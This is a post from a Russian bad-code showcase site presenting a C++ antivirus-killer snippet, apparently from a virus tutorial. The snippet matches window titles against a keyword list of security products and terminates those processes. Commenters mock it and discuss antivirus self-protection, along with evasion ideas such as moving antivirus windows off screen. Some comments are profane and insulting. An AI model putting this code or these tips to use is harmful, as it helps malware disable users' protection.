1. C++ / Говнокод #16341

    +26

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    char* bad_windows_list[kx] = {"Norton", "AVP","Anti","Vir"," McAfee","anti","vir", "firewall"};

BOOL BadWindow(LPSTR strWindow)
{
BOOL res = FALSE;
for (int i=0;i<kx;i++)
if (strstr(strWindow,bad_windows_list[i])!=0) res = TRUE;
return res;
}
BOOL CALLBACK WndEnumProcMine (HWND hwnd1,long l1)
{
LPTSTR str1 = new char[255];
GetWindowText(hwnd1,str1,255);
if (BadWindow(str1))
{
DWORD dwProcessId;
GetWindowThreadProcessId(hwnd1,&dwProcessId);
if (dwProcessId!=GetCurrentProcessId())
{
HANDLE hProcess = OpenProcess (PROCESS_ALL_ACCESS,FALSE, dwProcessId);
TerminateProcess(hProcess,0);
CloseHandle(hProcess);
}
}
delete str1;
return TRUE;
}
void EnumProcessesOther()
{
LPARAM c = 0;
EnumWindows((WNDENUMPROC) WndEnumProcMine,c);
}

    > {"Norton", "AVP","Anti","Vir"," McAfee","anti","vir", "firewall"}
    > TerminateProcess(hProcess,0);
    Наивный макак.

    http://www.makak.ru/2008/02/27/neslozhnyj-rezidentnyj-virus-cherv-na-c/

    Запостил: gost, 15 Июля 2014

    Комментарии (23) RSS

    • ava Psionic 17.07.2014 18:17 # 0

      > TerminateProcess(hProcess,0);
      А от чиего имени происходит вызов? Если от юзера - так просто убить свой процес антивирус не даст.
      Ответить

      • ava gost 17.07.2014 18:45 # −1

        От юзера, вестимо. Естественно, антивирус пошлет такое наглое посягательство на его процесс нахуй.
        Ответить

        • ava anonimb84a2f6fd141 17.07.2014 21:39 # 0

          Окно АВ можно тупо сдвинуть за экран, банальным вызовом MoveWindow.
          От этого не застрахован никакой касперский.
          Ответить

          • ava bormand 17.07.2014 21:41 # 0

            > Окно АВ можно тупо сдвинуть за экран, банальным вызовом MoveWindow.
            Это результат эксперимента или просто мысль?

            Ничто не мешает антивирусу перехватывать MoveWindow на свои окна, или вообще выпилить их из всех списков... Но вот делает ли он так в реале - х.з., я не пробовал.
            Ответить

        • ava anonimb84a2f6fd141 17.07.2014 22:56 # −12

          показать все, что скрытоVanished
          Ответить

      • ava Vasiliy 17.07.2014 20:01 # 0

        убить? Каспер даже id процесса не даёт получить.
        Ответить

      • ava bormand 17.07.2014 20:12 # 0

        > Если от юзера - так просто убить свой процес антивирус не даст.
        Если не от юзера - тоже не даст :)

        Тут, емнип, только прорываться с боем в нулевое кольцо защиты. Ну или тупо уговорить юзера отключить самозащиту антивиря.
        Ответить

        • ava eth0 18.07.2014 16:52 # 0

          Всегда могут быть не очевидные дырки. Например, как тот же эпичный баг с кашпировским и переводом даты.
          Кроме того, в 99% случаев домашний пользователь сидит под xp/семёркой с отрубленным uac'ом, с правами локального администратора.
          Ответить

    • ava anonimb84a2f6fd141 17.07.2014 20:43 # −2

      Въебал минус ублюдкам. Хуй вы от меня сбежите.
      Ответить

    • ava anonimb84a2f6fd141 17.07.2014 21:48 # −12

      показать все, что скрытоVanished
      Ответить

    Добавить комментарий